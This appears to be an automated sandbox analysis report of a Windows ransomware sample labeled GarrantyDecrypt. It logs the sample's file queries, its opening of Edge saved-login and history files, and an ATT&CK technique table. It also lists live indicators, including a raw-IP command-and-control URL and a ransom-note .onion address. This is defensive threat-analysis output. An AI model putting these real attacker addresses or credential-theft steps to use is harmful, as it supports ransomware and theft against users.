Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.29e797f3.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.3ce67b09.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.0eee61ec.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.45e00f56.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.a3fa76ae.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.5eee580c.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.e1dabada.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_helper.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\resources.pak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Registry Run Keys / Startup Folder (1) | Registry Run Keys / Startup Folder (1) | Masquerading (3) | OS Credential Dumping (1) | Security Software Discovery (1) | Taint Shared Content (1) | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Data Encrypted for Impact (2) |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Bootkit (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (11) | LSASS Memory | Virtualization/Sandbox Evasion (11) | Remote Desktop Protocol | Data from Local System (1) | Non-Application Layer Protocol (3) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | DLL Side-Loading (1) | Logon Script (Windows) | Bootkit (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (13) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | System Network Configuration Discovery (1) | Distributed Component Object Model | Input Capture | Proxy (1) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | File Deletion (1) | LSA Secrets | File and Directory Discovery (3) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (23) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 2b7cu0KwZl.exe | 47% | ReversingLabs | Win64.Ransomware.GarrantyDecrypt | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://api.ipify.org/6 | 0% | Avira URL Cloud | safe | |
| http://193.143.1.139/Ujdu8jjooue/biweax.php1 | 0% | Avira URL Cloud | safe | |
| http://193.143.1.139/9U6 | 0% | Avira URL Cloud | safe | |
| http://193.143.1.139/Ujdu8jjooue/biweax.php1y6 | 0% | Avira URL Cloud | safe | |
| http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO | 0% | Avira URL Cloud | safe | |
| http://193.143.1.139/ | 0% | Avira URL Cloud | safe | |
| http://api.ipify.orgunknown------------------------multipart/form-data; | 0% | Avira URL Cloud | safe | |
| http://193.143.1.139/Ujdu8jjooue/biweax.php | 0% | Avira URL Cloud | safe | |
| http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl | 0% | Avira URL Cloud | safe | |
| http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| api.ipify.org | 104.26.13.205 | true | false | | unknown |
    NameSourceMaliciousAntivirus DetectionReputation
    http://api.ipify.org/2b7cu0KwZl.exe, 00000000.00000003.1805381540.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804619437.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805035456.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819160509.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808182808.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808323206.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://193.143.1.139/Ujdu8jjooue/biweax.php2b7cu0KwZl.exefalse
      • Avira URL Cloud: safe
      unknown
      http://api.ipify.orgunknown------------------------multipart/form-data;2b7cu0KwZl.exefalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.139/9U62b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 
00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzORECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.drtrue
      • Avira URL Cloud: safe
      unknown
      http://api.ipify.org/62b7cu0KwZl.exe, 00000000.00000003.1817076512.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822753296.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804503862.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819426905.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822334255.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805117359.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.139/Ujdu8jjooue/biweax.php12b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
